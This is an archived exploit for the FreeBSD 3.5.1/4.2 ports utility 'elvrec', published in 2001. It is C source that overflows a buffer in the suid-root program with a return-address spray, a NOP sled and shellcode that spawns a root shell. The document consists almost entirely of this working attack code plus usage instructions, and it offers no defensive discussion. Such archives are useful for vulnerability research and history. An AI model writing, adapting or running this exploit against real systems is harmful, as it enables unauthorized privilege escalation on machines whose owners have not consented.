FreeBSD 3.5.1/4.2 - Ports Package 'elvrec' Local Privilege Escalation

/*
 * ja-elvis & ko-helvis - FreeBSD 3.5.1 & 4.2 ports package local root exploit
 *
 * vulnerable: versions prior to ja-elvis-1.8.4_1 and ko-helvis-1.8h2_1
 * 
 * The above two packages contain a file recovery utility 'elvrec', installed
 * suid root(4755) by default. The utility is subject to a buffer overflow 
 * leading to root privileges:
 *
 * Usage: ./elvwreck <offset> <alignment>
 * 
 * [email protected] // www.synnergy.net
 * 28 Feb 2001.
 *
 */ 

#include <stdio.h>
#include <stdlib.h>
#define PROG	"/usr/local/bin/elvrec"
#define VULN	608
#define BSIZE	1024
#define NOP	0x90
#define ESP	0xbfbff92c	// FreeBSD 4.2
#define OFFSET	0
#define EATME	1		// byte alignment

char shellcode[]= 
  "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
  "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
  "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
  "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
  "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
  "\x02\x02\x02/bin/sh.-c.sh";

int main(int argc, char *argv[]) {
  char buffer[BSIZE];
  long address=ESP;
  int i, offset, align;

  if(argc > 1) { offset = atoi(argv[1]); align = atoi(argv[2]); } 
  else { offset = OFFSET; align = EATME; }

  address += offset;
  fprintf(stderr, "\n* using ret %#x -> align %d -> offset %d\n\n", address, align, offset); 

  for(i=align; i<VULN; i+=4){ *(long *)&buffer[i] = address; }
  for(i=VULN; i<(BSIZE - strlen(shellcode) - 100); i++){ buffer[i] = NOP; }
  memcpy(buffer+i, shellcode, strlen(shellcode));
  buffer[BSIZE] = '\0';

  if(execlp(PROG, "elvrec", buffer, 0)) {
    fprintf(stderr, "Unable to execute %s\n\n", PROG);
    exit(1);
  }
}


// milw0rm.com [2001-03-03]